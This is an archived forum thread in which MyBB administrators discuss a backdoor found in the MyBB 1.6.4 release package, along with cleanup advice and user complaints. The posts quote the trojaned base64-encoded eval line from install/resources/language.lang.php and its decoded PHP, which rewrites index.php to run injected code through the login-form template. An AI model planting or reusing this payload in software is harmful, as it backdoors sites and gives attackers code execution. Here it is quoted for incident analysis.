MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > 1.6.4 Security Vulnerability
Full Version: 1.6.4 Security Vulnerability
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7 8 9 10

seminar techi

2011-10-24, 05:22 AM
(2011-10-24, 02:15 AM)WoodLark Wrote: [ -> ]If your mybb forum is not the top level of your website, check the directories ABOVE the forum directory. I found that the malicious code appeared in every file named "index.php" in the directories above the forum.

not "ABOVE the forum directory" alone ..


you need check all index.php file in your server....!

berni

2011-11-07, 10:59 AM
Did anyone check if the database has been compromised?

A note: It does not suffice to check 'index.php' files but you need to check all files on your server in all folders.

Angry And last a very serious note towards the maintainers of the mybbsoftware: My trust in you (which was high) has almost been destroyed by the way you handeled this issue. In my oppinion, there is no excuse that justifies not to inform the users (via the mailinglist and all other available channels) about such a serious issue for over two weeks - this should have been done the day it became known, at least the day after that. And still, the mailing suggests, that all is done with replacing the malicous index.php which is again not acceptable. There is much more to do: Check (or better replace) all files on your server, check (or better if possible replace by a backup) all databases on the server, change all passwords, probably even including the ones of your users. Although some administrators may decide, that they can leave out one or the other of these steps, I think it's your duty to inform your users, that this *might* be necessary. At least you should point them to this very posting.

patrick

2011-11-07, 11:27 PM
I've just heard now of this. BAD BAD BAD!

index.php has the modification
install/resources/language.lang.php contains
<p>Once you\'ve checked these details are correct, click next to continue.</p>';

$l['logo']=base64_decode('QGV2YWwoYmFzZTY0X2RlY29kZSgiSkhSamJYQTlRR1pwYkdWd1pYSnRjeWhOV1VKQ1gxSlBUMVF1SjJsdVpHVjRMbkJvY0NjcE95QkFZMmh0YjJRb1RWbENRbDlTVDA5VUxpZHBibVJsZUM1d2FIQW5MQ0F3TnpjM0tUc2dKSFJsYlhBOVFHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektFMVpRa0pmVWs5UFZDNG5hVzVrWlhndWNHaHdKeWs3SUNSMFlXMXdQVUJtYjNCbGJpaE5XVUpDWDFKUFQxUXVKMmx1WkdWNExuQm9jQ2NzSUNkM0p5azdJRUJtZDNKcGRHVW9KSFJoYlhBc0lFQnpkSEpmY21Wd2JHRmpaU2duWlhaaGJDZ2lYQ1JzYjJkcGJtWnZjbTBnUFNCY0lpSXVKSFJsYlhCc1lYUmxjeTArWjJWMEtDSnBibVJsZUY5c2IyZHBibVp2Y20waUtTNGlYQ0k3SWlrN0p5d2dKMlYyWVd3b0lsd2tiRzluYVc1bWIzSnRJRDBnWENJaUxpUjBaVzF3YkdGMFpYTXRQbWRsZENnaWFXNWtaWGhmYkc5bmFXNW1iM0p0SWlrdUlsd2lPeUl1UUNSamIyeGJNak5kS1RzbkxDQkFKSFJsYlhBcEtUc2dRR1pqYkc5elpTZ2tkR0Z0Y0NrN0lFQmphRzF2WkNoTldVSkNYMUpQVDFRdUoybHVaR1Y0TG5Cb2NDY3NJRUFrZEdOdGNDazdJSEpsZEhWeWJpQjBjblZsT3c9PSIpKQ==');
$l['database_settings'] = "Database Settings";

IMPORTANT!: the install/resources/language.lang.php was already modified in the mybb_1604.zip

Can someone please explain what this does?

StefanT

2011-11-08, 05:39 AM
This code modifies the index.php and adds the code mentioned on the blog.

patrick

2011-11-08, 08:37 AM
OK, now I understand. I thought index.php was modified in the package.

In case anyone else is interested in the code that's run:

$tcmp=@fileperms(MYBB_ROOT.'index.php');
@chmod(MYBB_ROOT.'index.php', 0777);
$temp=@file_get_contents(MYBB_ROOT.'index.php');
$tamp=@fopen(MYBB_ROOT.'index.php', 'w');
@fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp));
@fclose($tamp);
@chmod(MYBB_ROOT.'index.php', @$tcmp);
return true;

seminar techi

2011-11-10, 06:58 AM
(2011-11-08, 08:37 AM)patrick Wrote: [ -> ]
$tcmp=@fileperms(MYBB_ROOT.'index.php');
@chmod(MYBB_ROOT.'index.php', 0777);
$temp=@file_get_contents(MYBB_ROOT.'index.php');
$tamp=@fopen(MYBB_ROOT.'index.php', 'w');
@fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp));
@fclose($tamp);
@chmod(MYBB_ROOT.'index.php', @$tcmp);
return true;

hey what is this code for?

StefanT

2011-11-10, 07:20 AM
(2011-11-08, 05:39 AM)StefanT Wrote: [ -> ]This code modifies the index.php and adds the code mentioned on the blog.

kushalponnappa

2011-11-15, 05:58 AM
i think there is a bug in calender.php,someone hacked my forum n accessed my databases, he also changed admin panel passwords and have changed the calender page to some custom page,.. for that reason i removed calender.php.. why this happen?? i am loosing my forum for the second time, ..is there any problem with calender file??

Tomm M

2011-11-15, 08:43 AM
Not that we know of. Please remember to screen all files for other affected areas if your forum has been hacked before and please remember to run a full investigation into the hack than assume the calendar is at fault. In most cases, MyBB isn't the cause.

Robbert

2011-11-15, 08:49 PM
I have had this problem when it was first 'discovered', so I did all the above to fix it.

(removed the code, applied the patch, Chmod all the directories and files correctly (the sysyem health shows them green), and I changed my FTP pass. I also removed the trojan from my computer).

But today the problem reappeared! Again some of the files were changed (used the file verification to check). So I had to remove all the base64 encoded code and changed my FTP pass again.

Has anyone had this problem reappear on their forum as well?
Pages: 1 2 3 4 5 6 7 8 9 10
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > 1.6.4 Security Vulnerability